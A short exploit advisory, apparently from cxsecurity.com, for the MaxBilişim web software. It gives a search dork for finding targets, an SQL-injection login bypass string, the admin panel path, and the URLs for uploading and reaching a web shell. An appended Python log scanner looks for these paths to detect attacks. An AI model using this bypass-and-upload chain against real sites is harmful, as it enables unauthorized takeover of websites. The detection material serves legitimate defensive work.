MaxBilişim SQL Bypass & Shell Upload

Published: 2016.08.07
Credit: Av3LoXiS
Risk: High
CWE: N/A
CVE: N/A
Local: No
Remote: Yes
Dork: inurl:/index.php/ & Yazılım Maxbilişim

#SQL Bypass Code:

' or '1'='1' -- ' ~ ' or '1'='1'

#Admin Panel

http://www.example.com/myadmin/index.php

Shell Upload Link :

http://www.example.com/myadmin/index.php?panel=19

Shell Link :

http://www.example.com/images/temp/shellname.php

==========================================
# Discovered by : Av3LoXiS
# FB : /Av3LoXiS
#Zone -h : Av3LoXiS
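
For defenders, the paths named in this note translate directly into access-log checks. The following is an added example, not part of the original advisory: it assumes Common/Combined Log Format, and the sample log lines, IP addresses and the function names `classify` and `scan` are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed format: Apache/nginx Common or Combined Log Format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# Extensions commonly mapped to the PHP handler (assumption about the server).
SCRIPT_RE = re.compile(r"\.(php\d?|phtml|phar)(/|$)")

# Constructed sample lines using documentation IP ranges, not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [07/Aug/2016:10:01:02 +0300] "GET /index.php/urunler HTTP/1.1" 200 5120',
    '203.0.113.9 - - [07/Aug/2016:10:02:10 +0300] "POST /myadmin/index.php HTTP/1.1" 302 0',
    '203.0.113.9 - - [07/Aug/2016:10:02:40 +0300] "POST /myadmin/index.php?panel=19 HTTP/1.1" 200 812',
    '203.0.113.9 - - [07/Aug/2016:10:03:05 +0300] "GET /images/temp/shellname.php HTTP/1.1" 200 154',
    '198.51.100.7 - - [07/Aug/2016:10:04:00 +0300] "GET /images/temp/logo.jpg HTTP/1.1" 200 20480',
]

def classify(line):
    """Return (ip, rule, status) for a suspicious request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    path = url.path.lower()
    status = int(m["status"])
    # Rule 1: a script requested from the upload directory named in the note.
    # An image directory should never serve executable content.
    if path.startswith("/images/temp/") and SCRIPT_RE.search(path):
        return m["ip"], "script-in-upload-dir", status
    # Rule 2: POST to the upload panel (panel=19) of the admin area.
    if (m["method"] == "POST" and path == "/myadmin/index.php"
            and parse_qs(url.query).get("panel") == ["19"]):
        return m["ip"], "admin-upload-post", status
    return None

def scan(lines):
    """Classify every line and keep only the hits, in log order."""
    return [hit for hit in map(classify, lines) if hit]

if __name__ == "__main__":
    for ip, rule, status in scan(SAMPLE_LOG):
        print(ip, rule, status)
```

Rule 2 also matches a legitimate administrator using the upload panel, so treat it as a signal to correlate with rule 1 from the same address rather than as an alert on its own.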

Copyright 2017, cxsecurity.com